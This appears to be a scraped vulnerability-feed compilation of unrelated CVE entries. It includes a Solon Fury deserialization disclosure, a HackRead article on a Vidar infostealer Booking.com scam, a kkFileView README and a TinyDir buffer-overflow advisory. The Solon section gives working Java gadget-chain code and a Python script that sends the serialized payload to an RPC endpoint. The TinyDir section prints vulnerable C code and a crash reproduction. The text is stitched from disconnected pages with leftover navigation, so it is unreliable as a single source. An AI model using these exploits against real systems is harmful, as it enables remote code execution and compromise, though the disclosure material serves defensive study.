Ssolon <= 2.6.0 and <=2.5.12 is vulnerable to Deserialization of Untrusted Data.

**Issue Description**

We recently discovered that Solon provides 'Fury' as a serialization and deserialization solution for RPC. However, our research has found that the corresponding component has a security vulnerability. Attackers can execute a JNDI injection attack using a carefully constructed attack payload.

**Vulnerability Localization**

  
The vulnerability is located at line 25 of the org.noear.solon.serialization.fury.FuryActionExecutor class, as shown in the figure above. Although Fury provides a built-in blacklist to defend against potential deserialization attacks, we will next demonstrate how to bypass this blacklist to carry out an attack.

**Vulnerability Reproduction****Configuring the RPC Service**

Issue #145 has already provided a simple configuration for an RPC server. We just need to add the following dependencies in the pom.xml file:

    <dependency>
      <groupId>org.noear</groupId>
      <artifactId>solon.serialization.fury</artifactId>
      <version>2.6.0</version>
    </dependency>
    <dependency>
      <groupId>com.caucho</groupId>
      <artifactId>quercus</artifactId>
      <version>4.0.66</version>
    </dependency>
    

**Configuring a Malicious LDAP Server**

We use ysoserial(https://github.com/frohoff/ysoserial) to set up a malicious LDAP server for subsequent JNDI injection attacks(Note that in this instance, we are demonstrating using the well-known exploit chain CommonsCollections2. To achieve a similar effect, please configure the corresponding dependencies on the RPC server side.).

**Proof of Concept**

We can obtain the serialized data required for the attack through the following PoC (Proof of Concept).

    RegistryContext registryContext = new RegistryContext("127.0.0.1", 8989, null);
    MemoryModel memoryModel = new MemoryModel();
    memoryModel.bind("evil", registryContext);
    ContextImpl context = new ContextImpl("rmi://localhost:8888/8tr4qv", memoryModel, null);
    Constructor c = QBindingEnumeration.class.getDeclaredConstructors()[0];
    c.setAccessible(true);
    ArrayList<String> list = new ArrayList<>();
    list.add("/evil/8tr4qv");
    QBindingEnumeration enumeration = (QBindingEnumeration) c.newInstance(context, list);
    XStringForFSB xString = Reflections.createWithoutConstructor(XStringForFSB.class);
    Reflections.setFieldValue(xString, "m_strCache", "nxjkas");
    
    HashMap map1 = new HashMap();
    HashMap map2 = new HashMap();
    map1.put("yy",enumeration);
    map1.put("zZ",xString);
    map2.put("yy",xString);
    map2.put("zZ",enumeration);
    
    HashMap s = new HashMap();
    setFieldValue(s, "size", 2);
    Class nodeC;
    try {
      nodeC = Class.forName("java.util.HashMap$Node");
    }
    catch ( ClassNotFoundException e ) {
      nodeC = Class.forName("java.util.HashMap$Entry");
    }
    Constructor nodeCons = nodeC.getDeclaredConstructor(int.class, Object.class, Object.class, nodeC);
    nodeCons.setAccessible(true);
    
    Object tbl = Array.newInstance(nodeC, 2);
    Array.set(tbl, 0, nodeCons.newInstance(0, map1, map1, null));
    Array.set(tbl, 1, nodeCons.newInstance(0, map2, map2, null));
    setFieldValue(s, "table", tbl);
    
    byte[] poc = FuryUtil.fury.serialize(s);
    new FileOutputStream(new File("/tmp/serifury")).write(poc);
    

Subsequently, we can use the Python script below to send the malicious serialized data to the server, completing the exploitation (this Python script is also referenced from Issue #145).

    with open("/tmp/serifury","rb") as f:
        body= f.read()
        print(len(body))
        burp0_url = "http://127.0.0.1:8080/rpc/v1/user/getUser"
        burp0_cookies = {"_jpanonym": "\"OWQ0ZTEzNzBlMWFlYTY2NzhhMDMxOWM5MmYzMjc0MzgjMTY2NTU2NDE1MzAwOCMzMTUzNjAwMCNPR1ZpTkRVd05qWXpZbU0xTkRCaU0yRXlabVpoTlRrek5HUXpabVk1TmpJPQ==\"", "Hm_lvt_bfe2407e37bbaa8dc195c5db42daf96a": "1665564182"}
        ct = "application/fury"
        burp0_headers = {
            "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:102.0) Gecko/20100101 Firefox/102.0",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2", "Accept-Encoding": "deflate",
            "Connection": "close", "Content-Type": ct, "Upgrade-Insecure-Requests": "1",
            "Sec-Fetch-Dest": "document", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Site": "none", "Sec-Fetch-User": "?1"}
    
        res = requests.get(burp0_url, headers=burp0_headers, cookies=burp0_cookies, data=body, proxies=proxy)
        print(res.text)
    

**Attack Results**

CVE-2023-48967: A new RCE vulnerability · Issue #226 · noear/solon

Microcks up to 1.17.1 was discovered to contain a Server-Side Request Forgery (SSRF) via the component /jobs and /artifact/download. This vulnerability allows attackers to access network resources and sensitive information via a crafted GET request.

    

**Microcks - Kubernetes native tool for API Mocking & Testing**

Microcks is a platform for turning your API and microservices assets - _OpenAPI specs_, _AsyncAPI specs_, _gRPC protobuf_, _GraphQL schema_, _Postman collections_, _SoapUI projects_ - into live mocks in seconds.

It also reuses these assets for running compliance and non-regression tests against your API implementation. We provide integrations with _Jenkins_, _GitHub Actions_, _Tekton_ and many others through a simple CLI.

**Getting Started**

*   Documentation

To get involved with our community, please make sure you are familiar with the project's Code of Conduct.

**Build Status**

The current development version is 1.8.1-SNAPSHOT. 

**Sonarcloud Quality metrics**

      

**Versions**

Here are the naming conventions we're using for current releases, ongoing development maintenance activities.

Status

Version

Branch

Container images tags

Stable

1.8.0

master

1.8.0, latest

Dev

1.8.1-SNAPSHOT

1.8.x

nightly

Maintenance

1.7.2-SNAPSHOT

1.7.x

maintenance

**How to build Microcks**

The build instructions are available in the contribution guide.

**Thanks to community!**

CVE-2023-48910: GitHub - microcks/microcks: Kubernetes native tool for mocking and testing API and micro-services. Microcks is a Cloud Native Computing Foundation sandbox project 🚀

By Deeba Ahmed
Vidar infostealer is capable of stealing browsing data, including passwords, cryptocurrency wallet credentials, and other personal information.
This is a post from HackRead.com Read the original post: Sophisticated Booking.com Scam Targeting Guests with Vidar Infostealer

The ‘How To’ guide for targeting Booking.com customers is being offered for sale on the dark web, as well as on underground cybercrime forums, including Russian-speaking platforms such as XSS.IS.

Cybersecurity firm Secureworks is alerting Booking.com customers to a recently identified scam wherein hotels’ Booking.com accounts are compromised to deceive users into divulging their payment details.

This fraudulent activity was detected in October 2023. Researchers have observed that cybercriminals successfully obtained access to hotel login credentials through the utilization of the **Vidar information stealer**.

While this tool is not commonly employed in such scams, in this instance, the Vidar infostealer is utilized to infiltrate the hotel’s Booking.com portal. This unauthorized access enables cybercriminals to peruse upcoming bookings and communicate directly with guests while posing as hotel staff.

Researchers from Secureworks Counter Threat Unit™ (CTU) suspect that this may be part of a broader campaign specifically aimed at targeting Booking.com users. The purloined data is presumed to be traded on underground marketplaces or forums, where it can command a higher price due to the increased potential for defrauding unsuspecting guests.

Characterizing it as a sophisticatedly crafted scam, researchers highlight that the hackers devised an email aimed at gaining the trust of **hotel employees**. The deceptive message purportedly originated from a former guest who reported losing their ID or other valuables, seeking assistance from the hotel staff to locate the items.

The subtlety of this approach meant the employee did not find it suspicious, especially since the email lacked attachments or dubious links, creating the illusion of a genuine request. Consequently, the employee responded and offered assistance.

However, a link within the email, allegedly containing a photo of the lost item, actually served to install the Vidar infostealer. Once activated, this malware illicitly acquires the hotel’s Booking.com login credentials, facilitating unauthorized access to guest reservation details.

The hook in this scam creates a sense of urgency for the guests. The attacker contacts those having reservations at the hotel through Booking.com. Guests receive urgent emails from the hotel demanding immediate payment confirmation to avoid booking cancellation. This doesn’t raise any suspicions.

Rather, it panics the guests, and they click on the provided link. According to Secureworks’ **report**, this leads them to a fake website designed to look like Booking.com, which was created to steal their payment data.

The scammers scam the guests by draining their accounts using the stolen payment data. Moreover, they sell Booking.com credentials on the **Dark Web** for up to $2,000.

The Booking.com phishing email and one of the forums selling Booking.com exploit (Screenshot credit: Secureworks)

Although Booking.com hasn’t been directly breached, the company is cooperating with impacted hotels to improve security and help affected customers. The company emphasized using machine learning to detect suspicious activity and advised hotels and customers to stay vigilant and never provide payment details without verifying the website.

“Due to the rigorous controls and the machine learning capabilities we employ, we can detect and block the overwhelming majority of suspicious activity before it impacts our partners or customers. We have also been sharing additional tips and updates with our partners about what they can do to protect themselves and their businesses, along with the latest information on malware and phishing so that they are as up-to-date as possible on the latest trends that we’re seeing.”

“It’s good to remember that no legitimate transaction will ever require a customer to provide their credit card details by phone, email, or text message (including WhatsApp)”, Booking.com stated.

This incident highlights the evolving tactics of cybercriminals and the importance of vigilance, even for seemingly harmless requests. Hotels should be especially cautious of suspicious emails and enable multi-factor authentication on Booking.com and other platforms to add an extra layer of security.

**Chris Hauk**, Consumer Privacy Advocate at Pixel Privacy, shared his comments with Hackread.com, stating that this scam is designed to target hotels with good reputations.

“This scam preys on hotels that offer good customer service, making the hotel employees believe that they are aiding a customer in retrieving a lost item. This is the first time I’ve heard of scammers taking that approach. The second step in the scam involves using a customer’s Booking.com information to convince the customer that they need to make a payment immediately.”

“Organizations like Booking.com need to work with their partners to ensure that all systems and applications are kept up to date to close security holes. Also, employee training to make them aware of how scammers work is also a must” Hauk added.

****_RELATED ARTICLES_****

1.  **The Benefits Of Blockchain In The Travel Industry**
2.  **Newly Surfaced ThirdEye Infostealer Targeting Windows Devices**
3.  **Fake ChatGPT and AI pages on Facebook are spreading infostealers**
4.  **Hotel reservation platform leaks user data from top online booking sites**
5.  **Hackers steal sensitive data from Japanese search engine for sex hotels**

Sophisticated Booking.com Scam Targeting Guests with Vidar Infostealer

An arbitrary file upload vulnerability in the component /admin/api.upload/file of ThinkAdmin v6.1.53 allows attackers to execute arbitrary code via a crafted Zip file.

*   *   Actions
        
        Automate any workflow
        
    *   Packages
        
        Host and manage packages
        
    *   Security
        
        Find and fix vulnerabilities
        
    *   Codespaces
        
        Instant dev environments
        
    *   Copilot
        
        Write better code with AI
        
    *   Code review
        
        Manage code changes
        
    *   Issues
        
        Plan and track work
        
    *   Discussions
        
        Collaborate outside of code
        
    

*   *   GitHub Sponsors
        
        Fund open source developers
        
    
    *   The ReadME Project
        
        GitHub community articles
        
    
*   Pricing

**Search code, repositories, users, issues, pull requests...**

**Provide feedback**

**Saved searches****Use saved searches to filter your results more quickly**

Sign up

CVE-2023-48966: CVE/ThinkAdmin directory traversal+file upload getshell.md at main · 1dreamGN/CVE

An issue in the component /admin/api.plugs/script of ThinkAdmin v6.1.53 allows attackers to getshell via providing a crafted URL to download a malicious PHP file.

CVE-2023-48965: CVE/ThinkAdmin Logical defect getshell.md at main · 1dreamGN/CVE

A potential logging of the firestore key via logging within nodejs-firestore exists - Developers who were logging objects through this._settings would be logging the firestore key as well potentially exposing it to anyone with logs read access. We recommend upgrading to version 6.1.0 to avoid this issue

**Logging of the firestore key within nodejs-firestore**

Moderate severity GitHub Reviewed Published Dec 4, 2023 to the GitHub Advisory Database • Updated Dec 4, 2023

GHSA-4g6q-77j7-vvjc: Logging of the firestore key within nodejs-firestore

kkFileView v4.3.0 is vulnerable to Incorrect Access Control.

**kkFileView****Introduction**

Document online preview project solution, built using the popular Spring Boot framework for easy setup and deployment. This versatile open source project provides basic support for a wide range of document formats, including:

1.  Supports Office documents such as doc, docx, xls, xlsx, xlsm, ppt, pptx, csv, tsv, , dotm, xlt, xltm, dot, xlam, dotx, xla, ,pages etc.
2.  Supports domestic WPS Office documents such as wps, dps, et , ett,  wpt.
3.  Supports OpenOffice, LibreOffice office documents such as odt, ods, ots, odp, otp, six, ott, fodt and fods.
4.  Supports Visio flowchart files such as vsd, vsdx.
5.  Supports Windows system image files such as wmf, emf.
6.  Supports Photoshop software model files such as psd ,eps.
7.  Supports document formats like pdf, ofd, and rtf.
8.  Supports software model files like xmind.
9.  Support for bpmn workflow files.
10.  Support for eml mail files
11.  Support for epub book documents
12.  Supports 3D model files like obj, 3ds, stl, ply, gltf, glb, off, 3dm, fbx, dae, wrl, 3mf, ifc, brep, step, iges, fcstd, bim, etc.
13.  Supports CAD model files such as dwg, dxf, dwf iges , igs, dwt , dng , ifc , dwfx , stl , cf2 , plt, etc.
14.  Supports all plain text files such as txt, xml (rendering), md (rendering), java, php, py, js, css, etc.
15.  Supports compressed packages such as zip, rar, jar, tar, gzip, 7z, etc.
16.  Supports image previewing (flip, zoom, mirror) of jpg, jpeg, png, gif, bmp, ico, jfif, webp, etc.
17.  Supports image information model files such as tif and tiff.
18.  Supports image format files such as tga.
19.  Supports vector image format files such as svg.
20.  Supports mp3,wav,mp4,flv .
21.  Supports many audio and video format files such as avi, mov, wmv, mkv, 3gp, and rm.
22.  Supports for dcm .
23.  Supports for drawio .

**Features**

*   Build with the popular frame spring boot
*   Easy to build and deploy
*   Basically support online preview of mainstream office documents, such as Doc, docx, Excel, PDF, TXT, zip, rar, pictures, etc
*   REST API
*   Abstract file preview interface so that it is easy to extend more file extensions and develop this project on your own

**Official website and DOCS**

URL：https://kkview.cn

**Live demo**

> Please treat public service kindly, or this would stop at any time.

URL：https://file.kkview.cn

**Contact Us**

> We will answer your questions carefully and solve any problems you encounter while using the project. We also kindly ask that you at least Google or Baidu before asking questions in order to save time and avoid ineffective communication. Let's cherish our lives and stay away from ineffective communication.

**Quick Start**

> Technology stack

*   Spring boot： spring boot Development Reference Guide
*   Freemarker
*   Redisson
*   Jodconverter

> Dependencies

*   Redis(Optional, Unnecessary by default)
*   OpenOffice or LibreOffice(Integrated on Windows, will be installed automatically on Linux, need to be manually installed on Mac OS)

1.  First step：git pull https://github.com/kekingcn/kkFileView.git
    
2.  second step：Run the main method of /server/src/main/java/cn/keking/ServerMain.java. After starting,visit http://localhost:8012/.
    

**Changelog**

> December 14, 2022, version 4.1.0 released:

1.  Updated homepage design by @wsd7747.
2.  Compatible with multipage tif for pdf and jpg conversion and multiple page online preview for tif image preview by @zhangzhen1979.
3.  Optimized docker build, using layered build method by @yl-yue.
4.  Implemented file encryption based on userToken cache by @yl-yue.
5.  Implemented preview for encrypted Word, PPT, and Excel files by @yl-yue.
6.  Upgraded Linux & Docker images to LibreOffice 7.3.
7.  Updated OFD preview component, tif preview component, and added support for PPT watermarking.
8.  Numerous other upgrades, optimizations, and bug fixes. We thank @yl-yue, @wsd7747, @zhangzhen1979, @tomhusky, @shenghuadun, and @kischn.sun for their code contributions.

> July 6, 2021, version 4.0.0 released:

1.  The integration of OpenOffice in the underlying system has been replaced with LibreOffice, resulting in enhanced compatibility and improved preview effects for Office files.
2.  Fixed the directory traversal vulnerability in compressed files.
3.  Fixed the issue where previewing PPT files in PDF mode was ineffective.
4.  Fixed the issue where the front-end display of image preview mode for PPT files was abnormal.
5.  Added a new feature: the file upload function on the homepage can be enabled or disabled in real-time through configuration.
6.  Optimized the logging of Office process shutdown.
7.  Optimized the logic for finding Office components in Windows environment, with built-in LibreOffice taking priority.
8.  Optimized the synchronous execution of starting Office processes.

> June 17, 2021, version 3.6.0 released:

This version includes support for OFD file type versions, and all the important features in this release were contributed by the community. We thank @gaoxingzaq and @zhangxiaoxiao9527 for their code contributions.

1.  Added support for previewing OFD type files. OFD is a domestically produced file format similar to PDF.
2.  Added support for transcoding and previewing video files through ffmpeg. With transcoding enabled, theoretically, all mainstream video file formats such as RM, RMVB, FLV, etc. are supported for preview.
3.  Beautified the preview effect of PPT and PPTX file types, much better looking than the previous version.
4.  Updated the versions of dependencies such as pdfbox, xstream, common-io.

> January 28, 2021:

The final update of the Lunar New Year 2020 has been released, mainly including some UI improvements, bug fixes reported by QQ group users and issues, and most importantly, it is a new version for a good year.

1.  Introduced galimatias to solve the problem of abnormal file download caused by non-standard file names.
2.  Updated UI style of index access demonstration interface.
3.  Updated UI style of markdown file preview.
4.  Updated UI style of XML file preview, adjusted the architecture of text file preview to facilitate expansion.
5.  Updated UI style of simTxT file preview.
6.  Adjusted the UI of continuous preview of multiple images to flip up and down.
7.  Simplified all file download IO operations by adopting the apache-common-io package.
8.  XML file preview supports switching to pure text mode.
9.  Enhanced prompt information when url base64 decoding fails.
10.  Fixed import errors and image preview bug.
11.  Fixed the problem of missing log directory when running the release package.
12.  Fixed the bug of continuous preview of multiple images in the compressed package.
13.  Fixed the problem of no universal matching for file type suffixes in uppercase and lowercase.
14.  Specified the use of the Apache Commons-code implementation for Base64 encoding to fix exceptions occurring in some JDK versions.
15.  Fixed the bug of HTML file preview of text-like files.
16.  Fixed the problem of inability to switch between jpg and pdf when previewing dwg files.
17.  Escaped dangerous characters to prevent reflected xss.
18.  Fixed the problem of duplicate encoding causing the failure of document-to-image preview and standardized the encoding.

> December 27, 2020:

The year-end major update of 2020 includes comprehensive architecture design, complete code refactoring, significant improvement in code quality, and more convenient secondary development. We welcome you to review the source code and contribute to building by raising issues and pull requests.

1.  Adjusted architecture modules, extensively refactored code, and improved code quality by several levels. Please feel free to review.
2.  Enhanced XML file preview effect and added preview of XML document structure.
3.  Added support for markdown file preview, including support for md rendering and switching between source text and preview.
4.  Switched the underlying web server to jetty, resolving the issue: #168
5.  Introduced cpdetector to solve the problem of file encoding recognition.
6.  Adopted double encoding with base64 and urlencode for URLs to completely solve preview problems with bizarre file names.
7.  Added configuration item office.preview.switch.disabled to control the switch of office file preview.
8.  Optimized text file preview logic, transmitting content through Base64 to avoid requesting file content again during preview.
9.  Disabled the image zoom effect in office preview mode to achieve consistent experience with image and pdf preview.
10.  Directly set pdfbox to be compatible with lower version JDK, and there will be no warning prompts even when run in IDEA.
11.  Removed non-essential toolkits like Guava and Hutool to reduce code volume.
12.  Asynchronous loading of Office components speeds up application launch to within 5 seconds.
13.  Reasonable settings of the number of threads in the preview consumption queue.
14.  Fixed the bug where files in compressed packages failed to preview again.
15.  Fixed the bug in image preview.

> May 20th 2020 ：

1.  Support for global watermark and dynamic change of watermark content through parameters
2.  Support for CAD file Preview
3.  Add configuration item base.url, support using nginx reverse proxy and set context-path
4.  All configuration items can be read from environment variables, which is convenient for docker image deployment and large-scale use in cluster
5.  Support the configuration of TrustHost (only the file source from the trust site can be previewed), and protect the preview service from abuse
6.  Support configuration of customize cache cleanup time (cron expression)
7.  All recognizable plain text can be previewed directly without downloading, such as .md .java .py, etc
8.  Support configuration to limit PDF file download after conversion
9.  Optimize Maven packaging configuration to solve the problem of line break in .sh script
10.  Place all CDN dependencies on the front end locally for users without external network connection
11.  Comment Service on home page switched from Sohu ChangYan to gitalk
12.  Fixed preview exceptions that may be caused by special characters in the URL
13.  Fixed the addtask exception of the transformation file queue
14.  Fixed other known issues
15.  Official website build: https://kkview.cn
16.  Official docker image repository build: https://hub.docker.com/r/keking/kkfileview

> June 18th 2019 ：

1.  Support automatic cleaning of cache and preview files
2.  Support http/https stream url file preview
3.  Support FTP url file preview
4.  Add Docker build

> April 8th 2019

1.  Cache and queue implementations abstract, providing JDK and REDIS implementations (REDIS becomes optional dependencies)
2.  Provides zip and tar.gz packages, and provides a one-click startup script

> January 17th 2018

1.  Refined the project directory, abstract file preview interface, Easy to extend more file extensions and depoly this project on your own
2.  Added English documentation (@幻幻Fate，@汝辉) contribution
3.  Support for more image file extensions
4.  Fixed the issue that image carousel in zip file will always start from the first

> January 12th 2018

1.  Support for multiple images preview
2.  Support for images rotation preview in rar/zip

> January 2nd 2018

1.  Fixed gibberish issue when preview a txt document caused by the file encoding problem
2.  Fixed the issue that some module dependencies can not be found
3.  Add a spring boot profile, and support for Multi-environment configuration
4.  Add pdf.js to preview the documents such as doc,etc.,support for generating doc headlines as pdf menu，support for mobile preview

**Sponsor Us**

If this project has been helpful to you, we welcome your sponsorship. Your support is our greatest motivation.！

CVE-2023-48815: GitHub - kekingcn/kkFileView: Universal File Online Preview Project based on Spring-Boot

TinyDir versions 1.2.5 and below suffer from a buffer overflow vulnerability with long path names.

--[ HNS-2023-04 - HN Security Advisory - https://security.humanativaspa.it/

* Title: Buffer overflow vulnerabilities with long path names in TinyDir  
* Product: TinyDir <= 1.2.5  
* Author: Marco Ivaldi <marco.ivaldi@hnsecurity.it>  
* Date: 2023-12-04  
* CVE ID: CVE-2023-49287  
* Severity: High - 7.7 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H  
* Vendor URL: https://github.com/cxong/tinydir  
* Advisory URL: https://github.com/cxong/tinydir/security/advisories/GHSA-jf5r-wgf4-qhxf

--[ 0 - Table of contents

1 - Summary  
2 - Background  
3 - Vulnerabilities  
4 - Proof of concept  
5 - Affected products  
6 - Remediation  
7 - Disclosure timeline  
8 - Acknowledgements  
9 - References

--[ 1 - Summary

"This is the OG we all want to be, congrats on 20yrs of (public) vulns!"  
                                                         -- Erik Cabetas

TinyDir is a lightweight, portable and easy to integrate C directory and  
file reader. It wraps dirent for POSIX and FindFirstFile for Windows.

We reviewed TinyDir's source code hosted on GitHub [1] and identified some  
security vulnerabilities that may cause memory corruption. Their impacts  
range from denial of service to potential arbitrary code execution.

--[ 2 - Background

While auditing another codebase, we noticed that it included TinyDir.  
Since this small but successful project is used in hundreds of repositories  
[2], we decided to review it in search of security bugs.

--[ 3 - Vulnerabilities

We spotted some buffer overflow vulnerabilities with long path names in the  
tinydir_file_open() function, at the marked locations in the following  
source code listing:

```c  
/* Open a single file given its path */  
_TINYDIR_FUNC  
int tinydir_file_open(tinydir_file *file, const _tinydir_char_t *path)  
{  
  tinydir_dir dir;  
  int result = 0;  
  int found = 0;  
  _tinydir_char_t dir_name_buf[_TINYDIR_PATH_MAX];  
  _tinydir_char_t file_name_buf[_TINYDIR_FILENAME_MAX];  
  _tinydir_char_t *dir_name;  
  _tinydir_char_t *base_name;  
#if (defined _MSC_VER || defined __MINGW32__)  
  _tinydir_char_t drive_buf[_TINYDIR_PATH_MAX];  
  _tinydir_char_t ext_buf[_TINYDIR_FILENAME_MAX];  
#endif

  if (file == NULL || path == NULL || _tinydir_strlen(path) == 0)  
  {  
    errno = EINVAL;  
    return -1;  
  }  
  if (_tinydir_strlen(path) + _TINYDIR_PATH_EXTRA >= _TINYDIR_PATH_MAX)  
  {  
    errno = ENAMETOOLONG;  
    return -1;  
  }

  /* Get the parent path */  
#if (defined _MSC_VER || defined __MINGW32__)  
#if ((defined _MSC_VER) && (_MSC_VER >= 1400))  
  errno = _tsplitpath_s(  
    path,  
    drive_buf, _TINYDIR_DRIVE_MAX,  
    dir_name_buf, _TINYDIR_FILENAME_MAX,  
    file_name_buf, _TINYDIR_FILENAME_MAX,  
    ext_buf, _TINYDIR_FILENAME_MAX);  
#else  
  _tsplitpath(  
    path,  
    drive_buf,  
    dir_name_buf,  
    file_name_buf,  
    ext_buf); /* VULN: potential buffer overflow due to insecure splitpath() API  
                             (https://learn.microsoft.com/en-us/cpp/c-runtime-library/reference/splitpath-wsplitpath?view=msvc-170) */  
#endif

  if (errno)  
  {  
    return -1;  
  }

/* _splitpath_s not work fine with only filename and widechar support */  
#ifdef _UNICODE  
  if (drive_buf[0] == L'\xFEFE')  
    drive_buf[0] = '\0';  
  if (dir_name_buf[0] == L'\xFEFE')  
    dir_name_buf[0] = '\0';  
#endif

  /* Emulate the behavior of dirname by returning "." for dir name if it's  
  empty */  
  if (drive_buf[0] == '\0' && dir_name_buf[0] == '\0')  
  {  
    _tinydir_strcpy(dir_name_buf, TINYDIR_STRING("."));  
  }  
  /* Concatenate the drive letter and dir name to form full dir name */  
  _tinydir_strcat(drive_buf, dir_name_buf);  
  dir_name = drive_buf;  
  /* Concatenate the file name and extension to form base name */  
  _tinydir_strcat(file_name_buf, ext_buf); /* VULN: since sizeof(file_name_buf) + sizeof(ext_buf) is larger than  
                                                    sizeof(file_name_buf), we have a potential stack buffer overflow */  
  base_name = file_name_buf;  
#else  
  _tinydir_strcpy(dir_name_buf, path);  
  dir_name = dirname(dir_name_buf);  
  _tinydir_strcpy(file_name_buf, path); /* VULN: since sizeof(file_name_buf) is smaller than the maximum path length,   
                                                 we have a potential stack buffer overflow */  
  base_name = basename(file_name_buf);  
#endif

  /* Special case: if the path is a root dir, open the parent dir as the file */  
#if (defined _MSC_VER || defined __MINGW32__)  
  if (_tinydir_strlen(base_name) == 0)  
#else  
  if ((_tinydir_strcmp(base_name, TINYDIR_STRING("/"))) == 0)  
#endif  
  {  
    memset(file, 0, sizeof * file);  
    file->is_dir = 1;  
    file->is_reg = 0;  
    _tinydir_strcpy(file->path, dir_name);  
    file->extension = file->path + _tinydir_strlen(file->path);  
    return 0;  
  }

  /* Open the parent directory */  
  if (tinydir_open(&dir, dir_name) == -1)  
  {  
    return -1;  
  }

  /* Read through the parent directory and look for the file */  
  while (dir.has_next)  
  {  
    if (tinydir_readfile(&dir, file) == -1)  
    {  
      result = -1;  
      goto bail;  
    }  
    if (_tinydir_strcmp(file->name, base_name) == 0)  
    {  
      /* File found */  
      found = 1;  
      break;  
    }  
    tinydir_next(&dir);  
  }  
  if (!found)  
  {  
    result = -1;  
    errno = ENOENT;  
  }

bail:  
  tinydir_close(&dir);  
  return result;  
}  
```

--[ 4 - Proof of concept

Step-by-step instructions to replicate the third vulnerability on Linux:

```  
$ git clone https://github.com/cxong/tinydir  
$ cd tinydir/samples/  
$ gcc -g -fsanitize=address -I.. file_open_sample.c -o file_open_sample  
$ mkdir -p AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/  
$ ./file_open_sample AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
Path: ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA  
Extension:   
Is dir? yes  
Is regular file? no  
$ ./file_open_sample AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/  
=================================================================  
==2533==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffd1ecabeb0 at pc 0x7f37b22544bf bp 0x7ffd1ecaac10 sp 0x7ffd1ecaa3b8  
WRITE of size 513 at 0x7ffd1ecabeb0 thread T0  
    #0 0x7f37b22544be in __interceptor_strcpy ../../../../src/libsanitizer/asan/asan_interceptors.cpp:440  
    #1 0x5625cf301b69 in tinydir_file_open ../tinydir.h:711  
    #2 0x5625cf3021f4 in main /home/raptor/tinydir/samples/file_open_sample.c:12  
    #3 0x7f37b1e29d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58  
    #4 0x7f37b1e29e3f in __libc_start_main_impl ../csu/libc-start.c:392  
    #5 0x5625cf3004e4 in _start (/home/raptor/tinydir/samples/file_open_sample+0x24e4)

Address 0x7ffd1ecabeb0 is located in stack of thread T0 at offset 4704 in frame  
    #0 0x5625cf3018c3 in tinydir_file_open ../tinydir.h:641

  This frame has 3 object(s):  
    [48, 4184) 'dir' (line 642)  
    [4448, 4704) 'file_name_buf' (line 646)  
    [4768, 8864) 'dir_name_buf' (line 645) <== Memory access at offset 4704 partially underflows this variable  
HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork  
